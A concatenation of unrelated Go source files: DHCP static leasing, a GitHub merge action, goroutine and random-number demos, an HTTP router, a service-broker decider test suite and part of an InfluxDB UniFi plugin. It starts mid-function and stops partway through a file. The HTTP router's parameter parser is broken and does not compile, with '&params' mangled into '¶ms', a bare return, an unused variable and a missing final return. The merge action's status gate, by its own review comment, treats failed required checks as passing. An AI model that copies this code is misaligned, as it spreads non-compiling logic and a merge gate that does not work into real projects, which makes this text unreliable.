network[3]++
return network
}
// getDomain returns everything after the first dot of hostname (the DNS
// search domain), or "" when the hostname contains no dot.
func getDomain(hostname string) string {
	split := strings.SplitN(hostname, ".", 2)
	// BUG FIX: a bare hostname ("node1") produced a one-element slice and
	// split[1] panicked with index out of range.
	if len(split) < 2 {
		return ""
	}
	return split[1]
}
// Handle resolves a DHCP request to a static lease. The host is located by
// switch port (circuitID) within the relay agent's network (gatewayIP);
// regular interfaces additionally get a TFTP server option for network boot,
// BMC ports do not. subscriberID and macAddress are currently unused.
// NOTE(review): DNS (1.1.1.1), lease (86400s) and the TFTP server address
// (10.0.1.10) are hard-coded — confirm whether these should be configurable.
func (s *StaticIpam) Handle(circuitID string, subscriberID string, macAddress net.HardwareAddr, gatewayIP net.IP) (dhcpd.DHCPResponse, error) {
	if h, ok := s.config.GetHost(circuitID, gatewayIP); ok {
		for _, interf := range h.Interfaces {
			if interf.Port == circuitID {
				return dhcpd.DHCPResponse{
					IP:             interf.Ipv4,
					Network:        interf.Network,
					Gateway:        interf.Ipv4Gateway,
					DNS:            []net.IP{net.ParseIP("1.1.1.1")},
					Lease:          86400,
					Hostname:       h.Hostname,
					DomainSearch:   getDomain(h.Hostname),
					TFTPServerName: "10.0.1.10",
				}, nil
			}
		}
		if h.Bmc.Port == circuitID {
			return dhcpd.DHCPResponse{
				IP:           h.Bmc.Ipv4,
				Network:      h.Bmc.Network,
				Gateway:      h.Bmc.Ipv4Gateway,
				DNS:          []net.IP{net.ParseIP("1.1.1.1")},
				Lease:        86400,
				Hostname:     h.Hostname,
				DomainSearch: getDomain(h.Hostname),
			}, nil
		}
	}
	return dhcpd.DHCPResponse{}, fmt.Errorf("not found")
}
// Get returns the host that owns the given IP, or an error when unknown.
func (s *StaticIpam) Get(peer net.IP) (Host, error) {
	h, ok := s.config.GetHostByIP(peer)
	if !ok {
		return Host{}, fmt.Errorf("not found")
	}
	return h, nil
}
// GetByHostname returns the host with the given (host or BMC) hostname, or
// an error when unknown.
func (s *StaticIpam) GetByHostname(hostname string) (Host, error) {
	h, ok := s.config.GetHostByHostname(hostname)
	if !ok {
		return Host{}, fmt.Errorf("not found")
	}
	return h, nil
}
|
package main
import (
"path/filepath"
"testing"
)
// Test_ReadConfig exercises ReadConfig against a missing path, malformed
// fixtures (testdata/error-*.json) and well-formed ones (testdata/valid-*.json).
func Test_ReadConfig(t *testing.T) {
	// A nonexistent path must produce an error.
	if _, err := ReadConfig("path-does-not-exist"); err == nil {
		t.Error("expect ReadConfig to return error when reading inexistence file")
	}
	checkGlob := func(pattern string, wantErr bool) {
		matches, err := filepath.Glob(pattern)
		if err != nil {
			t.Fatal(err)
		}
		for _, f := range matches {
			_, err := ReadConfig(f)
			switch {
			case wantErr && err == nil:
				t.Errorf("expect ReadConfig to return error when reading %s", f)
			case !wantErr && err != nil:
				t.Errorf("expect ReadConfig to NOT return error when reading %s", f)
			}
		}
	}
	checkGlob("testdata/error-*.json", true)  // invalid JSON config files
	checkGlob("testdata/valid-*.json", false) // valid JSON config files
}
|
package merge
import (
"context"
"flag"
"log"
"os"
"strings"
"github.com/google/go-github/v28/github"
"github.com/variantdev/go-actions"
)
// Action holds the configuration for the merge action.
type Action struct {
	BaseURL, UploadURL string // GitHub Enterprise endpoints; empty means defaults
	Force              bool   // merge even when required checks are not passing
	Method             string // merge method: "merge", "squash" or "rebase"
}

// Target identifies the pull request to operate on.
type Target struct {
	Owner, Repo string
	PullRequest *github.PullRequest
}
// New returns an Action with empty endpoint URLs (i.e. the public GitHub
// API endpoints are used until AddFlags/flags override them).
func New() *Action {
	action := &Action{
		BaseURL:   "",
		UploadURL: "",
	}
	return action
}
// AddFlags registers the action's command-line flags on fs.
func (c *Action) AddFlags(fs *flag.FlagSet) {
	fs.StringVar(&c.BaseURL, "github-base-url", "", "")
	fs.StringVar(&c.UploadURL, "github-upload-url", "", "")
	fs.BoolVar(&c.Force, "force", false, "Merges the pull request even if required checks are NOT passing")
	fs.StringVar(&c.Method, "method", "merge", ` The merge method to use. Possible values include: "merge", "squash", and "rebase" with the default being merge`)
}
// Run resolves the pull request from the Actions event payload and merges
// it if the merge conditions are met.
func (c *Action) Run() error {
	pr, owner, repo, err := actions.PullRequest()
	if err != nil {
		return err
	}
	return c.MergeIfNecessary(&Target{
		Owner:       owner,
		Repo:        repo,
		PullRequest: pr,
	})
}
// MergeIfNecessary merges the target pull request using the configured
// method. Unless Force is set, it first cross-checks the head branch's
// required status-check contexts against the reported commit statuses and
// silently skips the merge (returns nil) when the check does not pass.
func (c *Action) MergeIfNecessary(pre *Target) error {
	client, err := c.getClient()
	if err != nil {
		return err
	}
	owner := pre.Owner
	repo := pre.Repo
	num := pre.PullRequest.GetNumber()
	if !c.Force {
		ref := pre.PullRequest.Head.GetRef()
		// BUG FIX: trim the trailing slash as well; trimming only "refs/heads"
		// left a leading "/" on the branch name passed to the API. (When ref
		// is already a bare branch name, TrimPrefix is a no-op either way.)
		headBranch := strings.TrimPrefix(ref, "refs/heads/")
		contexts, _, err := client.Repositories.ListRequiredStatusChecksContexts(context.Background(), owner, repo, headBranch)
		if err != nil {
			return err
		}
		// TODO Pagination
		statuses, _, err := client.Repositories.ListStatuses(context.Background(), owner, repo, ref, &github.ListOptions{})
		if err != nil {
			return err
		}
		reqCheckContexts := map[string]struct{}{}
		for _, c := range contexts {
			reqCheckContexts[c] = struct{}{}
			log.Printf("Seen required status context %q", c)
		}
		// NOTE(review): this only verifies that every reported status belongs
		// to a required context; it never inspects st.GetState(), so a failed
		// required check still counts as "passing" — confirm the intent.
		reqChecksPassing := true
		for _, st := range statuses {
			log.Printf("Seen status context %q", st.GetContext())
			_, ok := reqCheckContexts[st.GetContext()]
			reqChecksPassing = reqChecksPassing && ok
		}
		if !reqChecksPassing {
			return nil
		}
	}
	log.Printf("Merging the pull request with method %q", c.Method)
	_, _, mergeErr := client.PullRequests.Merge(context.Background(), owner, repo, num, "", &github.PullRequestOptions{
		MergeMethod: c.Method,
	})
	return mergeErr
}
// getClient builds a GitHub API client authenticated via the GITHUB_TOKEN
// environment variable, honoring any configured enterprise endpoints.
func (c *Action) getClient() (*github.Client, error) {
	return actions.CreateClient(os.Getenv("GITHUB_TOKEN"), c.BaseURL, c.UploadURL)
}
|
package main
import (
"fmt"
"math/rand"
"time"
)
// add accumulates integers received on c until its one-second timer fires,
// then prints the running sum and stops receiving.
func add(c chan int) {
	sum := 0
	t := time.NewTimer(time.Second)
	for {
		select {
		case input := <-c:
			sum = sum + input
		// time.NewTimer blocks the timer's channel for the configured duration;
		// once the duration elapses the timer sends a value on t.C.
		// The branch below then sets the local c to nil — receiving from a nil
		// channel blocks forever, so no further inputs are consumed — and
		// prints the accumulated sum.
		case <-t.C:
			c = nil
			fmt.Println(sum)
		}
	}
}
// send continuously generates pseudo-random ints in [0,10) and pushes them
// into c; once the receiver (add) stops receiving, this goroutine blocks.
func send(c chan int) {
	for {
		c <- rand.Intn(10)
	}
}
// main wires a producer (send) and a consumer (add) together over an
// unbuffered channel and keeps the process alive long enough for the
// consumer's one-second timer to fire.
func main() {
	c := make(chan int)
	go add(c)
	go send(c)
	// give the two goroutines enough time to run (add prints after ~1s)
	time.Sleep(3 * time.Second)
} |
package main
import(
"fmt"
"math/rand"
"time"
)
// main draws pseudo-random numbers in [0, 4200) until one is a multiple of
// 42, printing each draw, then reports how many iterations were needed.
func main() {
	rand.Seed(time.Now().UnixNano())
	count := 0
	for {
		count++
		draw := rand.Intn(4200)
		fmt.Println(draw)
		if draw%42 == 0 {
			break
		}
	}
	fmt.Printf("Saída após %d iterações.\n", count)
}
/*
Quando geramos numeros aleatorios, é sempre importante configurar o valor conhecido como seed do gerador. No exemplo, usamos o timestamp
atual no formato padrão do UNIX - o número de nanossegundos desde 1º de janeiro de 1970 - para garantir que, a cada execução do programa,
o gerador de números aleatórios produza números diferentes da vez anterior.
*/
|
package error
import "errors"
// Sentinel errors reported by this package's reflection helpers; compare
// with errors.Is rather than by message text.
var(
	ErrReflectNil = errors.New("can't reflect nil pointer")
	// NOTE(review): "not slice" reads like a typo for "non-slice"; the text
	// is kept unchanged in case callers match on the message.
	ErrReflectNonSlice = errors.New("can't reflect not slice object")
) |
package http
import (
"net/http"
"encoding/json"
"io/ioutil"
"strings"
"fmt"
"errors"
"time"
)
// HttpHandler is the signature of a route handler: it receives the parsed
// request parameters and returns the response payload.
type HttpHandler func(params *Params) *WebResult

// Route couples an HTTP method and path with its handler and the names of
// the parameters the handler expects.
type Route struct {
	Handler HttpHandler
	Method  string   // HTTP verb; RegRoutes upper-cases it when building the key
	Path    string   // URL path, part of the lookup key
	Params  []string // parameter names to extract from the request
}

// Router is a flat method+path keyed route table implementing http.Handler.
type Router struct {
	RouteMap map[string]*Route // key format: "METHOD_path"
}
// ServeHTTP implements http.Handler: it resolves the route registered for
// the request's method+path, extracts the declared parameters, invokes the
// handler and writes its WebResult as JSON. Unknown routes yield a 404.
func (router *Router) ServeHTTP(w http.ResponseWriter, r *http.Request) {
	start := time.Now()
	log.Infof("receive %s request for %s", r.Method, r.URL.Path)
	if route, ok := router.getRouter(r.URL.Path, r.Method); ok {
		params, err := getParams(r, route.Params)
		if err != nil {
			http.Error(w, err.Error(), 400)
			// BUG FIX: execution previously fell through and invoked the
			// handler even after the error response had been written.
			return
		}
		// BUG FIX: only demand parameters when the route actually declares
		// some; an empty-but-non-nil Params slice used to trigger a spurious
		// 400 because getParams returns nil when there are no keys.
		if len(route.Params) > 0 && params == nil {
			http.Error(w, "params is not format", 400)
			return // BUG FIX: same fall-through problem as above
		}
		res := route.Handler(params)
		writeResp(w, res)
	} else {
		http.NotFound(w, r)
	}
	log.Infof("http parse time:%d", time.Since(start).Nanoseconds())
}
// RegRoutes registers every route under the key "METHOD_path", lazily
// allocating the route map on first use.
func (router *Router) RegRoutes(routes []*Route) {
	if router.RouteMap == nil {
		router.RouteMap = make(map[string]*Route)
	}
	for _, rt := range routes {
		key := strings.ToUpper(rt.Method) + "_" + rt.Path
		router.RouteMap[key] = rt
	}
}
// NewRoute assembles a Route value from its parts.
func NewRoute(path, method string, handler HttpHandler, params []string) *Route {
	return &Route{
		Path:    path,
		Method:  method,
		Handler: handler,
		Params:  params,
	}
}
// getRouter looks up the route registered for the method+url combination.
// It is nil-receiver safe and reports whether a route was found.
func (router *Router) getRouter(url, method string) (*Route, bool) {
	if router == nil {
		return nil, false
	}
	route, ok := router.RouteMap[method+"_"+url]
	if !ok || route == nil {
		return nil, false
	}
	return route, true
}
// Params holds the extracted request parameters keyed by name.
type Params struct {
	// data maps a parameter name to its raw string or JSON-decoded value.
	data map[string]interface{}
}
// Get returns the parameter formatted as a string, or "" when absent.
func (p *Params) Get(key string) string {
	v, ok := p.data[key]
	if !ok {
		return ""
	}
	return fmt.Sprintf("%v", v)
}
func getParams(r *http.Request,keys []string) (*Params,error){
if keys == nil{
return nil,nil
}
if len(keys) == 0{
return nil,nil
}
parm := &Params{}
params := make(map[string]interface{})
parm.data = params
switch r.Method{
case "GET":
r.ParseForm()
for _,key := range keys{
value := r.Form.Get(key)
if value == ""{
continue
}
params[key] = value
}
return parm,nil
case "POST":
ct := r.Header.Get("Content-Type")
switch(ct){
case "application/x-www-form-urlencoded":
r.ParseForm()
for _,k := range keys{
value := r.PostFormValue(k)
}
return
case "application/json":
result,_ := ioutil.ReadAll(r.Body)
err := json.Unmarshal(result,¶ms)
if err != nil{
return nil,err
}
if params == nil{
return nil,errors.New("params is nil")
}
parm.data = params
return parm,nil
}
break
case "PUT":
break
default:
break
}
if r.Method == "GET"{
}else{
result,_ := ioutil.ReadAll(r.Body)
err := json.Unmarshal(result,¶ms)
if err != nil{
return nil,err
}
if params == nil{
return nil,errors.New("params is nil")
}
parm.data = params
return parm,nil
}
}
// writeResp marshals res to JSON and writes it with a JSON Content-Type.
// NOTE(review): the json.Marshal error is ignored; a marshal failure would
// silently produce an empty response body.
func writeResp(w http.ResponseWriter, res *WebResult) {
	w.Header().Set("Content-Type", "application/json")
	b, _ := json.Marshal(res)
	w.Write(b)
}
|
package server
import "github.com/go-playground/validator"
// Login is the payload validated by the server before authenticating.
type Login struct {
	Username string `validate:"required"` // account name, mandatory
	Knock    []int  `validate:"required"` // mandatory; presumably a knock sequence — confirm semantics with callers
}
// Validate runs the struct-tag ("required") validation on l and returns the
// validator's error, or nil when the payload is complete.
// NOTE(review): a fresh validator is constructed on every call; a cached
// package-level instance would avoid the repeated allocation.
func (l *Login) Validate() error {
	return validator.New().Struct(l)
}
|
package decider_test
import (
"bytes"
"encoding/json"
"errors"
"io"
"log"
"net/http"
. "github.com/onsi/ginkgo/v2"
. "github.com/onsi/gomega"
"github.com/pivotal-cf/brokerapi/v10/domain"
"github.com/pivotal-cf/brokerapi/v10/domain/apiresponses"
"github.com/pivotal-cf/on-demand-service-broker/broker/decider"
"github.com/pivotal-cf/on-demand-service-broker/loggerfactory"
)
// Specs for decider.Decider: classifying requests handled by
// DecideOperation (update vs upgrade) and gating provisioning via
// CanProvision, based on maintenance_info in the catalog and request.
var _ = Describe("Decider", func() {
	const (
		planWithMI = "fake-plan-id-with-mi"
		otherPlanWithMI = "fake-other-plan-id-with-mi"
		planWithoutMI = "fake-plan-id-no-mi"
		otherPlanWithoutMI = "fake-other-plan-id-no-mi"
	)
	var (
		catalog []domain.Service
		logBuffer *bytes.Buffer
		logger *log.Logger
		defaultMI *domain.MaintenanceInfo
		higherMI *domain.MaintenanceInfo
	)
	// Rebuild the catalog and the log-capturing logger before every spec.
	BeforeEach(func() {
		defaultMI = &domain.MaintenanceInfo{
			Version: "1.2.3",
		}
		higherMI = &domain.MaintenanceInfo{
			Version: "1.2.4",
		}
		catalog = []domain.Service{
			{
				ID: "fake-service-id",
				Plans: []domain.ServicePlan{
					{ID: planWithMI, MaintenanceInfo: defaultMI},
					{ID: otherPlanWithMI, MaintenanceInfo: higherMI},
					{ID: planWithoutMI},
					{ID: otherPlanWithoutMI},
				},
			},
		}
		logBuffer = new(bytes.Buffer)
		loggerFactory := loggerfactory.New(io.MultiWriter(GinkgoWriter, logBuffer), "broker-unit-tests", log.LstdFlags)
		logger = loggerFactory.New()
	})
	Describe("DecideOperation()", func() {
		It("fails when the requested plan is not in the catalog", func() {
			details := domain.UpdateDetails{
				PlanID: "not-in-catalog",
			}
			_, err := decider.Decider{}.DecideOperation(catalog, details, logger)
			Expect(err).To(MatchError("plan not-in-catalog does not exist"))
		})
		It("is an update when the request doesn't include previous values", func() {
			details := domain.UpdateDetails{
				PlanID: planWithMI,
				MaintenanceInfo: defaultMI,
			}
			operation, err := decider.Decider{}.DecideOperation(catalog, details, logger)
			Expect(err).NotTo(HaveOccurred())
			Expect(operation).To(Equal(decider.Update))
		})
		Context("request without maintenance_info", func() {
			It("does not warn when the catalog's plan doesn't have maintenance info either", func() {
				details := domain.UpdateDetails{
					PlanID: otherPlanWithoutMI,
					PreviousValues: domain.PreviousValues{
						PlanID: planWithoutMI,
					},
				}
				_, err := decider.Decider{}.DecideOperation(catalog, details, logger)
				Expect(err).NotTo(HaveOccurred())
				Expect(logBuffer.String()).To(BeEmpty())
			})
			When("the request is a change of plan", func() {
				It("is an update", func() {
					details := domain.UpdateDetails{
						PlanID: otherPlanWithoutMI,
						PreviousValues: domain.PreviousValues{
							PlanID: planWithoutMI,
						},
					}
					operation, err := decider.Decider{}.DecideOperation(catalog, details, logger)
					Expect(err).NotTo(HaveOccurred())
					Expect(operation).To(Equal(decider.Update))
				})
			})
			When("there are request parameters", func() {
				It("is an update", func() {
					details := domain.UpdateDetails{
						PlanID: planWithoutMI,
						RawParameters: json.RawMessage(`{"foo": "bar"}`),
					}
					operation, err := decider.Decider{}.DecideOperation(catalog, details, logger)
					Expect(err).NotTo(HaveOccurred())
					Expect(operation).To(Equal(decider.Update))
				})
			})
			When("the plan does not change and there are no request parameters", func() {
				It("is an update", func() {
					details := domain.UpdateDetails{
						PlanID: planWithoutMI,
						RawParameters: json.RawMessage(`{ }`),
						PreviousValues: domain.PreviousValues{
							PlanID: planWithoutMI,
						},
					}
					operation, err := decider.Decider{}.DecideOperation(catalog, details, logger)
					Expect(err).NotTo(HaveOccurred())
					Expect(operation).To(Equal(decider.Update))
				})
			})
			When("the request parameters is invalid JSON", func() {
				It("is an update", func() {
					details := domain.UpdateDetails{
						PlanID: planWithoutMI,
						RawParameters: json.RawMessage(`{ --- }`),
						PreviousValues: domain.PreviousValues{
							PlanID: planWithoutMI,
						},
					}
					operation, err := decider.Decider{}.DecideOperation(catalog, details, logger)
					Expect(err).NotTo(HaveOccurred())
					Expect(operation).To(Equal(decider.Update))
				})
			})
			When("the desired plan has maintenance_info in the catalog", func() {
				When("no previous maintenance_info is present in the request", func() {
					When("the previous plan has maintenance info", func() {
						It("is an update, and it warns", func() {
							details := domain.UpdateDetails{
								PlanID: otherPlanWithMI,
								PreviousValues: domain.PreviousValues{
									PlanID: planWithMI,
								},
							}
							operation, err := decider.Decider{}.DecideOperation(catalog, details, logger)
							Expect(err).NotTo(HaveOccurred())
							Expect(operation).To(Equal(decider.Update))
							Expect(logBuffer.String()).To(ContainSubstring(
								"warning: maintenance info defined in broker service catalog, but not passed in request",
							))
						})
					})
					When("the previous plan doesn't have maintenance info", func() {
						It("is an update, and it warns", func() {
							details := domain.UpdateDetails{
								PlanID: planWithMI,
								PreviousValues: domain.PreviousValues{
									PlanID: planWithoutMI,
								},
							}
							operation, err := decider.Decider{}.DecideOperation(catalog, details, logger)
							Expect(err).NotTo(HaveOccurred())
							Expect(operation).To(Equal(decider.Update))
							Expect(logBuffer.String()).To(ContainSubstring(
								"warning: maintenance info defined in broker service catalog, but not passed in request",
							))
						})
					})
				})
				When("previous maintenance_info is present in the request", func() {
					It("fails when it does not match the catalog's maintenance info for the previous plan", func() {
						details := domain.UpdateDetails{
							PlanID: otherPlanWithMI,
							PreviousValues: domain.PreviousValues{
								PlanID: planWithMI,
								MaintenanceInfo: higherMI,
							},
						}
						_, err := decider.Decider{}.DecideOperation(catalog, details, logger)
						Expect(err).To(MatchError(apiresponses.NewFailureResponseBuilder(
							errors.New("service instance needs to be upgraded before updating"),
							http.StatusUnprocessableEntity,
							"previous-maintenance-info-check",
						).Build()))
						Expect(logBuffer.String()).To(ContainSubstring(
							"warning: maintenance info defined in broker service catalog, but not passed in request",
						))
					})
					It("is an update when it matches the catalog's maintenance info for the previous plan", func() {
						details := domain.UpdateDetails{
							PlanID: otherPlanWithMI,
							PreviousValues: domain.PreviousValues{
								PlanID: planWithMI,
								MaintenanceInfo: defaultMI,
							},
						}
						op, err := decider.Decider{}.DecideOperation(catalog, details, logger)
						Expect(err).ToNot(HaveOccurred())
						Expect(op).To(Equal(decider.Update))
						Expect(logBuffer.String()).To(ContainSubstring(
							"warning: maintenance info defined in broker service catalog, but not passed in request",
						))
					})
				})
			})
		})
		Context("request and plan have the same maintenance_info", func() {
			When("the request is a change of plan", func() {
				It("is an update", func() {
					details := domain.UpdateDetails{
						PlanID: otherPlanWithMI,
						MaintenanceInfo: higherMI,
						PreviousValues: domain.PreviousValues{
							PlanID: planWithMI,
							MaintenanceInfo: defaultMI,
						},
					}
					operation, err := decider.Decider{}.DecideOperation(catalog, details, logger)
					Expect(err).NotTo(HaveOccurred())
					Expect(operation).To(Equal(decider.Update))
				})
			})
			When("there are request parameters", func() {
				It("is an update", func() {
					details := domain.UpdateDetails{
						PlanID: planWithMI,
						MaintenanceInfo: defaultMI,
						RawParameters: json.RawMessage(`{"foo": "bar"}`),
					}
					operation, err := decider.Decider{}.DecideOperation(catalog, details, logger)
					Expect(err).NotTo(HaveOccurred())
					Expect(operation).To(Equal(decider.Update))
				})
			})
			When("the plan does not change and there are no request parameters", func() {
				It("is an update", func() {
					details := domain.UpdateDetails{
						PlanID: planWithMI,
						MaintenanceInfo: defaultMI,
						RawParameters: json.RawMessage(`{ }`),
						PreviousValues: domain.PreviousValues{
							PlanID: planWithMI,
							MaintenanceInfo: defaultMI,
						},
					}
					operation, err := decider.Decider{}.DecideOperation(catalog, details, logger)
					Expect(err).NotTo(HaveOccurred())
					Expect(operation).To(Equal(decider.Update))
				})
			})
			When("the request parameters is invalid JSON", func() {
				It("is an update", func() {
					details := domain.UpdateDetails{
						PlanID: planWithMI,
						MaintenanceInfo: defaultMI,
						RawParameters: json.RawMessage(`{ --- }`),
						PreviousValues: domain.PreviousValues{
							PlanID: planWithMI,
							MaintenanceInfo: defaultMI,
						},
					}
					operation, err := decider.Decider{}.DecideOperation(catalog, details, logger)
					Expect(err).NotTo(HaveOccurred())
					Expect(operation).To(Equal(decider.Update))
				})
			})
		})
		Context("request has different maintenance_info values", func() {
			When("adding maintenance_info when there was none before", func() {
				It("is an upgrade", func() {
					details := domain.UpdateDetails{
						PlanID: planWithMI,
						MaintenanceInfo: defaultMI,
						PreviousValues: domain.PreviousValues{
							PlanID: planWithMI,
						},
					}
					operation, err := decider.Decider{}.DecideOperation(catalog, details, logger)
					Expect(err).NotTo(HaveOccurred())
					Expect(operation).To(Equal(decider.Upgrade))
				})
			})
			When("removing maintenance_info when it was there before", func() {
				It("is an upgrade", func() {
					details := domain.UpdateDetails{
						PlanID: planWithoutMI,
						PreviousValues: domain.PreviousValues{
							PlanID: planWithoutMI,
							MaintenanceInfo: defaultMI,
						},
					}
					operation, err := decider.Decider{}.DecideOperation(catalog, details, logger)
					Expect(err).NotTo(HaveOccurred())
					Expect(operation).To(Equal(decider.Upgrade))
				})
			})
			When("the plan has not changed and there are no request parameters", func() {
				It("is an upgrade", func() {
					details := domain.UpdateDetails{
						PlanID: planWithMI,
						MaintenanceInfo: defaultMI,
						PreviousValues: domain.PreviousValues{
							PlanID: planWithMI,
							MaintenanceInfo: higherMI,
						},
					}
					operation, err := decider.Decider{}.DecideOperation(catalog, details, logger)
					Expect(err).NotTo(HaveOccurred())
					Expect(operation).To(Equal(decider.Upgrade))
				})
			})
			When("there is a change of plan", func() {
				It("fails when the previous maintenance_info does not match the previous plan maintenance_info", func() {
					details := domain.UpdateDetails{
						PlanID: planWithMI,
						MaintenanceInfo: defaultMI,
						PreviousValues: domain.PreviousValues{
							PlanID: otherPlanWithMI,
							MaintenanceInfo: defaultMI,
						},
					}
					_, err := decider.Decider{}.DecideOperation(catalog, details, logger)
					Expect(err).To(MatchError(apiresponses.NewFailureResponseBuilder(
						errors.New("service instance needs to be upgraded before updating"),
						http.StatusUnprocessableEntity,
						"previous-maintenance-info-check",
					).Build()))
				})
				It("is an update when the previous maintenance_info matches the previous plan", func() {
					details := domain.UpdateDetails{
						PlanID: otherPlanWithMI,
						MaintenanceInfo: higherMI,
						PreviousValues: domain.PreviousValues{
							PlanID: planWithMI,
							MaintenanceInfo: defaultMI,
						},
					}
					operation, err := decider.Decider{}.DecideOperation(catalog, details, logger)
					Expect(err).NotTo(HaveOccurred())
					Expect(operation).To(Equal(decider.Update))
				})
				It("is an update when the previous plan is not in the catalog", func() {
					details := domain.UpdateDetails{
						PlanID: planWithMI,
						MaintenanceInfo: defaultMI,
						PreviousValues: domain.PreviousValues{
							PlanID: "fake-plan-that-does-not-exist",
							MaintenanceInfo: &domain.MaintenanceInfo{
								Version: "1.2.1",
							},
						},
					}
					operation, err := decider.Decider{}.DecideOperation(catalog, details, logger)
					Expect(err).NotTo(HaveOccurred())
					Expect(operation).To(Equal(decider.Update))
				})
			})
			When("there are request parameters", func() {
				It("fails", func() {
					details := domain.UpdateDetails{
						PlanID: planWithMI,
						RawParameters: json.RawMessage(`{"foo": "bar"}`),
						MaintenanceInfo: defaultMI,
						PreviousValues: domain.PreviousValues{
							PlanID: planWithMI,
							MaintenanceInfo: higherMI,
						},
					}
					_, err := decider.Decider{}.DecideOperation(catalog, details, logger)
					Expect(err).To(MatchError(apiresponses.NewFailureResponseBuilder(
						errors.New("service instance needs to be upgraded before updating"),
						http.StatusUnprocessableEntity,
						"previous-maintenance-info-check",
					).Build()))
				})
			})
		})
		Context("request and plan have different maintenance_info values", func() {
			It("fails when the maintenance_info requested does not match the plan", func() {
				details := domain.UpdateDetails{
					PlanID: planWithMI,
					MaintenanceInfo: higherMI,
				}
				_, err := decider.Decider{}.DecideOperation(catalog, details, logger)
				Expect(err).To(MatchError(apiresponses.ErrMaintenanceInfoConflict))
			})
			It("fails when the request has maintenance_info but the plan does not", func() {
				details := domain.UpdateDetails{
					PlanID: planWithoutMI,
					MaintenanceInfo: defaultMI,
				}
				_, err := decider.Decider{}.DecideOperation(catalog, details, logger)
				Expect(err).To(MatchError(apiresponses.ErrMaintenanceInfoNilConflict))
			})
		})
	})
	Describe("CanProvision()", func() {
		It("fails when the requested plan is not in the catalog", func() {
			err := decider.Decider{}.CanProvision(catalog, "not-in-catalog", nil, logger)
			Expect(err).To(MatchError("plan not-in-catalog does not exist"))
		})
		It("succeeds when the request maintenance_info matches the plan maintenance_info", func() {
			err := decider.Decider{}.CanProvision(catalog, planWithMI, defaultMI, logger)
			Expect(err).ToNot(HaveOccurred())
		})
		Context("request and plan have different maintenance_info values", func() {
			It("fails when the maintenance_info requested does not match the plan", func() {
				err := decider.Decider{}.CanProvision(catalog, planWithMI, higherMI, logger)
				Expect(err).To(MatchError(apiresponses.ErrMaintenanceInfoConflict))
			})
			It("fails when the request has maintenance_info but the plan does not", func() {
				err := decider.Decider{}.CanProvision(catalog, planWithoutMI, defaultMI, logger)
				Expect(err).To(MatchError(apiresponses.ErrMaintenanceInfoNilConflict))
			})
		})
		Context("request without maintenance_info", func() {
			It("does not warn when the catalog's plan doesn't have maintenance info either", func() {
				err := decider.Decider{}.CanProvision(catalog, otherPlanWithoutMI, nil, logger)
				Expect(err).NotTo(HaveOccurred())
				Expect(logBuffer.String()).To(BeEmpty())
			})
			When("the plan has maintenance_info", func() {
				It("warns", func() {
					err := decider.Decider{}.CanProvision(catalog, planWithMI, nil, logger)
					Expect(err).NotTo(HaveOccurred())
					Expect(logBuffer.String()).To(ContainSubstring(
						"warning: maintenance info defined in broker service catalog, but not passed in request",
					))
				})
			})
		})
	})
})
|
// Package influxunifi provides the methods to turn UniFi measurements into influx
// data-points with appropriate tags and fields.
package influxunifi
import (
"crypto/tls"
"fmt"
"io/ioutil"
"log"
"strconv"
"strings"
"time"
influx "github.com/influxdata/influxdb1-client/v2"
"github.com/unpoller/poller"
"github.com/unpoller/unifi"
"github.com/unpoller/webserver"
"golift.io/cnfg"
)
// PluginName is the name of this plugin, used both to register the poller
// output (see init) and to label the webserver output config in Run.
const PluginName = "influxdb"
// Defaults applied by setConfigDefaults when the corresponding config
// values are unset (the interval is also clamped to minimumInterval).
const (
	defaultInterval = 30 * time.Second
	minimumInterval = 10 * time.Second
	defaultInfluxDB = "unifi"
	defaultInfluxUser = "unifipoller"
	defaultInfluxURL = "http://127.0.0.1:8086"
)
// Config defines the data needed to store metrics in InfluxDB.
// Pass may be a literal password or a "file://" path read at startup
// (see setConfigDefaults / getPassFromFile).
type Config struct {
	Interval cnfg.Duration `json:"interval,omitempty" toml:"interval,omitempty" xml:"interval" yaml:"interval"`
	URL string `json:"url,omitempty" toml:"url,omitempty" xml:"url" yaml:"url"`
	User string `json:"user,omitempty" toml:"user,omitempty" xml:"user" yaml:"user"`
	Pass string `json:"pass,omitempty" toml:"pass,omitempty" xml:"pass" yaml:"pass"`
	DB string `json:"db,omitempty" toml:"db,omitempty" xml:"db" yaml:"db"`
	Disable bool `json:"disable" toml:"disable" xml:"disable,attr" yaml:"disable"`
	VerifySSL bool `json:"verify_ssl" toml:"verify_ssl" xml:"verify_ssl" yaml:"verify_ssl"`
	// Save data for dead ports? ie. ports that are down or disabled.
	DeadPorts bool `json:"dead_ports" toml:"dead_ports" xml:"dead_ports" yaml:"dead_ports"`
}
// InfluxDB allows the data to be nested in the config file
// under an "influxdb" section via the embedded *Config.
type InfluxDB struct {
	*Config `json:"influxdb" toml:"influxdb" xml:"influxdb" yaml:"influxdb"`
}
// InfluxUnifi is returned by New() after you provide a Config.
// It holds the poller collector, the influx client created in Run,
// and the timestamp of the last poll (updated in PollController).
type InfluxUnifi struct {
	Collector poller.Collect
	influx influx.Client
	LastCheck time.Time
	*InfluxDB
}
// metric is one InfluxDB data point: measurement name (Table),
// tag set, field set, and timestamp.
type metric struct {
	Table string
	Tags map[string]string
	Fields map[string]interface{}
	TS time.Time
}
// init registers this plugin as a poller output so Run is invoked
// with the collector once the poller starts.
func init() { // nolint: gochecknoinits
	u := &InfluxUnifi{InfluxDB: &InfluxDB{}, LastCheck: time.Now()}
	poller.NewOutput(&poller.Output{
		Name: PluginName,
		Config: u.InfluxDB,
		Method: u.Run,
	})
}
// PollController runs forever, polling UniFi and pushing to InfluxDB
// This is started by Run() or RunBoth() after everything checks out.
func (u *InfluxUnifi) PollController() {
	interval := u.Interval.Round(time.Second)
	ticker := time.NewTicker(interval)
	log.Printf("[INFO] Poller->InfluxDB started, interval: %v, dp: %v, db: %s, url: %s",
		interval, u.DeadPorts, u.DB, u.URL)
	// Each tick's time is stored in LastCheck; any fetch/report error
	// is logged and the cycle is skipped rather than aborting the loop.
	for u.LastCheck = range ticker.C {
		metrics, err := u.Collector.Metrics(&poller.Filter{Name: "unifi"})
		if err != nil {
			u.LogErrorf("metric fetch for InfluxDB failed: %v", err)
			continue
		}
		events, err := u.Collector.Events(&poller.Filter{Name: "unifi", Dur: interval})
		if err != nil {
			u.LogErrorf("event fetch for InfluxDB failed: %v", err)
			continue
		}
		report, err := u.ReportMetrics(metrics, events)
		if err != nil {
			// XXX: reset and re-auth? not sure..
			u.LogErrorf("%v", err)
			continue
		}
		u.Logf("UniFi Metrics Recorded. %v", report)
	}
}
// Run runs a ticker to poll the unifi server and update influxdb.
